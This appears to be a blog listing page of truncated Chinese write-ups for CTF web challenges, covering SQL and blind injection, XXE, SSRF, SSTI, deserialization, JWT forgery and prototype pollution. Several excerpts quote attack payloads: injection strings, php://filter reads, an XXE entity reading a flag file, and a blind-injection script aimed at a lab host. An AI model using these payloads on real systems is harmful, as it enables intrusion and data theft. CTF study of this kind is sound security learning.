- 博客(85)
- 收藏
- 关注
RSS订阅原创 [HFCTF2020]BabyUpload session解析引擎
对于代码的解析如上,获取flag的途径:1、session中的username参数要为admin2、在 /var/babyctf/success.txt存在在代码审查中可以得到的信息点:在php中,session文件默认的存储文件名是sess_PHPSESSID,于是我们可以利用donwnload先看一下原先的session文件里面有什么,经过分析可以知道$attr参数我们可以暂时设置为空,因为目前感觉跟我们的操作没多大关系可以发现有一个不可见字符,不同的php引擎,session的存储方式不一
2022-07-05 16:05:36
1340
1
原创 [网鼎杯 2020 青龙组]filejava
看见java我就有点后怕,因为我怎么不懂java,当作一个学习过程吧进去后就看见是一个上传题目,随便传一个文件进行抓包发现有一个filename参数,立刻联想到是不是有路径穿越问题,加上之前做过几个java题都是web-inf泄露 先试试../看看我们现在在哪 数了一下有九个,于是我就../九个然后去看配置文件总共有三个文件,我们需要去class里面给他们下下来,记住要带后缀,而且.是代表/,我记得我第一次做的时候直接用的.导致出不来 下下来的文件拖到IDEA进行观察,发现没有java基础果然看不怎
2022-07-03 15:21:35
1909
1
原创 [SUCTF 2018]annonymous 真的是匿名函数么
<?php$MY = create_function("","die(`cat flag.php`);");$hash = bin2hex(openssl_random_pseudo_bytes(32));eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}");if(isset($_GET['func_name'])){ $_GET["func_name"](); die();.
2022-05-27 15:29:57
512
原创 [CISCN2019 华东南赛区]Web4 FLASK的session伪造
进入网站后点击read something看见一个疑似远程文件泄露尝试了一下伪协议filter没有反应,file被禁用了到这里我就卡住了,我想不到还有什么可以远程读取文件的了学习得知大佬们一看这个路由就不像是php的,于是盲猜是python的FLASK框架,利用load_file来读取源文件(我查不到这个读取的来源,不理解为啥是这个)可以打开etc/passwd,从最后一行可以看到最后一个用户执行了/app目录下的一个/bin/ash命令,也就意味着我们当前在/app目录的上..
2022-05-24 16:03:10
632
原创 [WMCTF2020]Make PHP Great Again 软连接绕过
<?phphighlight_file(__FILE__);require_once 'flag.php';if(isset($_GET['file'])) { require_once $_GET['file'];}打开题目一看,这么几行代码,就这?话不多说直接伪协议读取flag.phpphp://filter/read=convert.base64-encode/resource=flag.php欸嘿,啥都没出来,也没报错说什么有过滤??或许这个函数有可能不一样,去.
2022-05-23 20:05:36
977
原创 [网鼎杯2018]Unfinish 数据库注入‘+‘的利用
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的随便注册一个登录试试发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道但我们输入1'or'1'='1进行前后引号闭合的..
2022-05-22 16:11:07
856
原创 [SWPU2019]Web4 盲注+代码审查
开始用dirsearch扫描了一下后台,发现没扫出啥玩意儿,或许是一个注入题(又到我的弱处了),先常规的使用 ' ; # 来判断一下发现当我们只输入1'的时候发现是一个函数文件CBTool.php报错,而1的时候是一个正常的echo错误看来username确实存在注入点,但不知道是哪个方面的注入 ,试了一下异或,盲注都不行,又超出我注入浅薄的知识了,学习得知一个方法:当输入1'报错,但是1"没有报错的话,那就是堆叠注入了,然后我试了一下最基本的一些堆叠注入,发现都被过滤了,真是有点严啊……...
2022-05-21 17:37:19
913
原创 [第二章 web进阶]SSRF Training
好久没写过SSRF了,感觉都忘了,就找来一个写写<?php highlight_file(__FILE__);function check_inner_ip($url) { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try {
2022-05-19 09:40:37
1065
原创 [HarekazeCTF2019]Avatar Uploader 1
符合pattern,随便弄个admin进去看看玄虚根据要求传png图片后发现只是换了个头像,通过F12可以看到上传图片的位置我在这里想是不是要伪造一个木马文件传入进去,但是感觉是白名单过滤,有点难搞,没有切入点,后面看wp的时候发现原题给了源码<?phperror_reporting(0);require_once('config.php');require_once('lib/util.php');require_once('lib/session.php')...
2022-05-17 17:10:37
664
原创 [GXYCTF2019]BabysqliV3.0 phar反序列化
随便输入两个1看来是要admin登录了,密码我起初以为通过万能密码可以绕过,结果没反应,最后试了一下top100爆破,出来了密码就是password进入后看到url有一个file参数对应的是upload,页面提示我们现在是引用的upload.php文件,因此我们可以利用伪协议来读取源码了<?phpsession_start();echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=u...
2022-05-15 19:06:38
276
原创 [FireshellCTF2020]Caas C的预处理
进入可以看到是一个编译器 ,输入简单的php代码试试<?php phpinfo();?>不知道什么的报错,直接复制报错代码百度一下看看(仔细地可以看见最前面有一个后缀.c)发现清一色的C语言报错,那我们找个c语言代码传进去试试#include <stdio.h> int main() { printf("hello, world");}下载出来一个不知什么文件思路到这里就断了,其实可以猜到flag在服务器的某个文件下,也许..
2022-05-15 14:46:11
399
原创 [N1CTF 2018]eating_cms parse_url函数漏洞
进入就是一个登陆界面,随便输入一个账号密码抓包看看发现有数据库语句,便试试万能密码1'or'1'='1'#发现被过滤了,一般这种题有个register.php和一个地方可以读取到源码的,我们要寻找试试发现有注册界面,注册登陆一下发现进入一个user.php页面,翻一下没有跟我们输入有关的回显,我们关注到有个page参数,不知道可不可以帮助我们读取到源码,直接伪协议试试?page=php://filter/read=convert.base64-encode/res..
2022-05-14 22:21:08
599
原创 [极客大挑战 2020]Roamphp1-Welcome 请求方式不对
进入后我没仔细看,发现网页无法正常运行,以为没网了,后面仔细一看报错的状态是405百度安全验证原来是请求方式有问题,便抓包改一下请求方式<?phperror_reporting(0);if ($_SERVER['REQUEST_METHOD'] !== 'POST') {header("HTTP/1.1 405 Method Not Allowed");exit();} else { if (!isset($_POST['roam1']) || !is..
2022-05-14 11:47:47
309
原创 [BSidesCF 2019]SVGMagic XXE的SVG注入
进入题目可以看到叫我们利用魔法将SVG转为PNG,查资料了解一下SVG是个啥东西XML的SVG知识总结_叨唠的博客-优快云博客_svg xml是一个图片,既然是XML里面的图片标签,那么则可以往XXE注入里面想想,但是SVG不知道怎么构造浅谈SVG的两个黑魔法 - 知乎我们可以利用text标签来显现文字,将文字改为引用我们的恶意代码即可<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <...
2022-05-13 20:34:38
998
1
原创 [极客大挑战 2020]Greatphp 原生类绕过
<?phperror_reporting(0);class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== s.
2022-05-10 20:44:34
1126
1
原创 [EIS 2019]EzPOP 代码审查
源码<?phperror_reporting(0);class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
2022-05-08 21:55:22
418
原创 [安洵杯 2019]不是文件上传 文件上传的注入
进入题目传了一个jpg图片上去发现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符)啪啪打脸,各个地方抓一下包show.php,upload.php以及show.php?delete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp……没想到的是!!!根据这条信息去github找这个出题人获得源码,好好代码审计了(不愧是锻炼搜索能力,..
2022-05-07 20:29:41
588
原创 [GYCTF2020]Ez_Express 原型链污染
进入链接可以发现是一个登录界面 ,自己注册一个新账户的话登陆进去什么东西也没有,提示你要用ADMIN登录,我账户名用ADMIN的话,报错敏感信息难道是一个烦人的注入题么,不急先扫一下站看看,发现有个www.zip压缩包泄露,将源码下载下来可以了解到是一个js的题目,寻找一下跟登录有关的界面代码router.post('/login', function (req, res) { if(req.body.Submit=="register"){ if(safeKeyword..
2022-05-03 18:52:06
665
原创 bestphp‘s revenge
这题开始我不知道是不是环境的原因,一模一样的payload前天一直出不来,但是今天却出来了,赶紧记录一下,知识点考的挺多的1、session反序列化2、php原生类SoapClient的SSRF3、CRLF4、变量覆盖1、session反序列化,我新学的一个东西,起初没碰过这种题目,其暗示想到的hint在于session_start();PHPsession反序列化 - 百度文库其原理是利用php编译器序列化保存的不同php.ini中存在三项配置session.save_path
2022-05-01 16:47:43
404
原创 [CSAWQual 2019]Web_Unagi xxe转码绕过waf
搜索给我们的信息flag在flag下面,可能要用到文件读取或者系统命令可以看到它叫我们上传一个xml文件,应该是xxe漏洞了这里应该是提示我们会回显哪些属性,可以看到password没有显示出来利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0<?xml version='1.0'?><!DOCTYPE users [<!ENTITY xxe SYSTEM "file:///flag" >]>.
2022-04-28 19:48:26
1490
原创 [RoarCTF 2019]Online Proxy ip二次注入
打开题目发现hint有点像文件泄露,于是打算用伪协议下载一下各个源码发现报错,以为是flag或者php被过滤了,于是我下别的html文件,依然如此……用dirsearch扫描只出来两个文件一个db.php还有一个不记得去了(第二天写的wp),但是都没什么用试了很久,发现没有https://就会报错感觉这里不是切入点了,于是我抓包看看有没有别的信息看到有个ip点,想着是不是SSTI,便试试X-Forwarded-For发现可以控制Current ip,然后上一个ip..
2022-04-28 11:40:26
685
1
原创 [ISITDTU 2019]EasyPHP
<?phphighlight_file(__FILE__);$_ = @$_GET['_'];if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) die('rosé will not do it');if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd ) die('you are so close, omg');eval($_).
2022-04-25 21:18:57
1930
原创 记录一下盲注脚本
import requestsurl= 'http://46206bf0-67f6-43a5-ac69-5d26d094e942.node4.buuoj.cn:81/backend/content_detail.php'database =""payload1 = "?id=1^(ascii(substr((select(database())),{},1))>{})^1" #库名为newspayload2 = "?id=1^(ascii(substr((select(group_co.
2022-04-22 18:57:21
2380
原创 [b01lers2020]Life on Mars
点进去可以看见是类似于日记一样的起初我以为是那种唬人的,flag在每个主题里面,NO扫描目录,无东西看源码,无hint通过抓包跳转发现有东西有参数!把search改为1会回显1,改为2还是1,于是在想利用之前那个地点来试试可不可以联合注入发现成功回显了1,2,看来这就是一个注入题目了,试试database()数据库aliens union select 1,group_concat(table_name) from information_schema.t...
2022-04-22 09:20:47
304
原创 [SCTF2019]Flag Shop erb模板注入
进入题目可以看到一个是要用自己的JinKela去购买flag这种类型的题目我想到之前都是有一个jwt认证,通过伪造验证信息修改金额以达到购买的效果点击work抓包可以发现确实有jwt(通过一段字符一个点来看出),便解码试试之前做过将alg这个算法改为none即可实现无算法认证,但是这里改后发现构造不出来jwt认证结果,不知什么原因,看来只能寻找密匙了。JWT介绍_没逛够的博客-优快云博客通过dirsearch扫描可以扫到robots.txt文件require 'sin...
2022-04-21 14:01:41
2542
原创 [SUCTF 2018]GetShell 中文取反绕过
在上传文件界面可以看到提示代码if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } } 可以知道这段代码的意
2022-04-19 19:52:48
270
原创 eregi函数漏洞
<?phpif(!$_GET['id']){header('Location: hello.php?id=1');exit();}$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];if(stripos($a,'.')){echo 'no no no no no no no';return ;}$data = @file_get_contents($a,'r');//eregi搜索字符串,$b的第一个字符和111拼接后检查1114从是否.
2022-04-18 20:21:55
885
原创 [BJDCTF2020]EzPHP
查看F12可以看见一个base32编码进去后发现是源码,开始审查源码<?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><font color=red><B>Thi...
2022-04-17 20:12:24
1028
原创 [NCTF2019]SQLi regexp正则注入
进去明摆着叫我们注入获得用户名或密码,先不急看看还有没有一些信息,扫后台可以发现robots.txt文件,里面暗示我们去hint.txt看一下可以发现我们只需要获取admin的密码即可,账号任意$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|datab...
2022-04-15 19:39:59
2055
原创 [红明谷CTF 2021]write_shell 反引号与短标签
<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
2022-04-10 15:30:28
1772
原创 [CISCN2019 华东南赛区]Double Secret flask的debug
打开靶机可以发现什么都没有,扫目录发现robots.txt,console(secret页面不知道为啥我开始没有扫出来)进入console是一个交互平台,需要pin值,有点像python的debug(我开始还在这里看了很久的js文件)robots.txt我以为会给几个地址呢,结果告诉是一个安卓ctf,对于现在水平的我感觉没多大帮助secret终于有用了,告诉我们给他一个secret值,它会加密让别人看不见,不知道是不是flag,试试吧,便用GET或者POST方法上传secret参数试
2022-04-10 10:37:08
1316
原创 [NPUCTF2020]ezinclude
进去发现只告诉我一个账号密码错误,于是抓包看看发现这里有个md5加密后密码要等与pass变量,有一个hash值,不正好是md5加密的么,我就试试get方法和post方法传入试试成功!发现一个跳转页面,继续可以看到一个跳转的404页面,我们可以在burpsuite上面弄,也可以用一个关闭js的插件来禁止它跳转。可以看到body那有一个远程文件包含漏洞,直接用filter伪协议读取源码<html><head><script langua..
2022-04-07 20:27:35
812
1
原创 [CSCCTF 2019 Qual]FlaskLight SSTI注入
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎可以发现在searched后面输出了49,既然我们可以利用{{}},又有输出点,直接模板注入GOGOGOpython-flask模块注入(SSTI) - ctrl_TT豆 - 博客园因为不太熟,只能一步步来''.__class__ //先随便查看一个字符所属的类是什么''.__class__.__mro__ //返回...
2022-04-05 20:08:34
2358
原创 [网鼎杯 2018]Comment 注入读取文件load_file
记录一下做这道题的经历和思路发帖的时候要进行账号登陆,里面暗示了账号以及部分密码,后面的三个***我们采用爆破来进行
2022-04-01 18:08:22
1542
原创 [HFCTF2020]EasyLogin JWT认证
这里记录一下我写题和学习的过程,具体对JWT还是不太了解的,希望大佬们指点一二注册账号密码后在登陆的地方抓了个包发现一个authorization授权,cookie里面有两个参数,感觉这个题应该考的是认证方面的,要用管理员的账户登陆进去才能获得flag,在flag界面只有一个js文件,打开看看/** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */function login() { const username =
2022-03-31 19:21:19
2802
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人